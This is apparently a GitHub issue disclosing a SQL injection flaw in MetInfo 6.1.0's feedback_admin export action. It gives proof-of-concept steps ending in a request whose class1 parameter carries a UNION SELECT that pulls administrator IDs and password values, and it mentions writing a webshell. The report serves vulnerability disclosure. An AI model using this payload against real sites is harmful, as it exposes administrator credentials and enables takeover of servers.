Skip to content

metinfo 6.1.0 feedback_admin.class.php SqlInjection Vulnerability  #2

Open
@panghusec

Description

@panghusec

Attackers can get arbitrary data from the database.Even use sql to write a webshell.
POC:

1.First download the metinfo the Latest version from https://www.metinfo.cn/download/

qq 20180815134928

2.Then install it and login as admin

3.Last request http://localhost/admin/index.php?n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(admin_id,0x7e,admin_pass)//from/**/met_admin_table

123

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions